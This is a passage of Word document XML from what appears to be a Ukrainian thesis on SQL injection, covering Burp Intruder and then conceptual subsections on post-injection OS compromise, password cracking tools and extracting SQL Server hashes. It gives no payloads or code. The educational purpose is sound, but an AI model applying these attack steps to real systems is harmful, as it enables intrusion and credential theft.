      </w:r>
      <w:r w:rsidRPr="004B547E">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00C92CC5">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4B4C">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>. Результатом роботи буде таблиця з різними даними (статус, довжина відповіді і т.д.)</w:t>
      </w:r>
      <w:r w:rsidR="004B547E" w:rsidRPr="004B547E">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B547E">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>[45]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6712CBF9" w14:textId="77777777" w:rsidR="004B547E" w:rsidRPr="004B547E" w:rsidRDefault="004B547E" w:rsidP="004B547E">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F3592C0" w14:textId="145D0035" w:rsidR="00376454" w:rsidRDefault="006C4B4C" w:rsidP="006C4B4C">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="451F752E" wp14:editId="5B133BF8">
            <wp:extent cx="6120130" cy="40481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4048125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF8743F" w14:textId="71192C15" w:rsidR="006C4B4C" w:rsidRPr="006C4B4C" w:rsidRDefault="006C4B4C" w:rsidP="006C4B4C">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.6.8.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Burp</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4B4C">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Intruder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA9B565" w14:textId="77777777" w:rsidR="004B547E" w:rsidRDefault="004B547E" w:rsidP="00376454">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E020E64" w14:textId="77777777" w:rsidR="006C4B4C" w:rsidRPr="00376454" w:rsidRDefault="006C4B4C" w:rsidP="00376454">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A1EEE8A" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00AB53FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="576"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_Toc516752144"/>
      <w:bookmarkStart w:id="82" w:name="_Toc30433131"/>
      <w:r w:rsidRPr="00AB53FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.7</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB53FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Advanced SQL Injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
    <w:p w14:paraId="2FB1E8C5" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="008861B4" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="573B8FBA" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">В методології </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, наступний крок зловмисника буде скомпрометувати основну операційну систему і мережі. Атакуючий не зупиняється на компрометації даних додатка. Атакуючий буде просувати атаку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> для компрометації основної ОС та мережі. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2305BB52" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Використовуючи скомпрометований додаток, зловмисник може вводити команди на базовій ОС, для того, щоб взяти під контроль цільову машину і використовувати її як перевалочний пункт для атаки іншої частини мережі.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF01015" w14:textId="10E9954A" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Атакуючий може взаємодіяти з ОС для витягування паролів, виконання команд, доступ до системних файлів. Атакуючий може просунутись далі для компрометації цілої мережі для встановленн</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>я Троянського коня і кейлогерів</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [2</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA5C08E" w14:textId="5F67CFB3" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C97F479" w14:textId="77777777" w:rsidR="00101F0F" w:rsidRPr="008861B4" w:rsidRDefault="00101F0F" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AD8FA01" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00561580" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_Toc516752145"/>
      <w:bookmarkStart w:id="84" w:name="_Toc30433132"/>
      <w:r w:rsidRPr="00561580">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2.7.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00561580">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Advanced Enumeration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:p w14:paraId="40FBB9ED" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="008861B4" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14189078" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Атакуючий використовує </w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Advanced</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enumeration</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> техніку для системного і мережевого рівня збору інформації. Інформація зібрана на попередніх етапах може бути використана знову для отримання неавторизованого доступу. Атакуючий може зламати пароль за допомогою різноманітних інструментів таких як </w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>John</w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ripper</w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cain</w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; </w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Abel</w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Brutus</w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cURL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, атакуючий використовує переповнення буфера для визначення вразливості в системній мережі. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6AF721" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="008861B4" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B9774EB" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00561580" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="_Toc516752146"/>
      <w:bookmarkStart w:id="86" w:name="_Toc30433133"/>
      <w:r w:rsidRPr="00561580">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2.7.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00561580">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Password Grabbing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p w14:paraId="5C6D4398" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="008861B4" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66C71175" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Password Grabbing</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> це один з найбільш серйозних наслідків </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>. Атакуючий краде пароль з заданих користувачем таблиць баз даних через SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">ін’єкцію. Атакуючий використовує свої прийоми </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> і формує SQL запит, призначений для захоплення пароля з користувацьких таблиць бази даних. Атакуючий може змінити, знищити, або вкрасти паролі. Іноді атакуючий може навіть досягти успіху в ескалації привілеїв до рівня адміністратора, використовуючи вкрадений пароль.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF59D47" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="008861B4" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="529F9C96" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00561580" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="_Toc516752147"/>
      <w:bookmarkStart w:id="88" w:name="_Toc30433134"/>
      <w:r w:rsidRPr="00561580">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2.7.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00561580">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Grabbing SQL Server Hashes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p w14:paraId="504700A1" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="008861B4" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EF00E08" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Деякі бази даних зберігають ID користувачів і паролі в </w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sysxlogins</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> таблиці в формі хешу. Атакуючий намагається витягнути ці хеші через повідомлення про помилку, але не може прочитати їх, тому що вони відображаються у форматі хешу. Для відображення хешу в зручному для сприйняття людини форматі, атакуючий перетворює ці хеш значення, щоб вони правильно відображались в повідомленнях про помилки. Потім він їх всі об’єднує.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A57382C" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="008861B4" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F12E613" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="005A6E5A" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc516752148"/>
      <w:bookmarkStart w:id="90" w:name="_Toc30433135"/>
      <w:r w:rsidRPr="005A6E5A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2.7.4 </w:t>
      </w:r>
      <w:r w:rsidRPr="005A6E5A">
        <w:rPr>
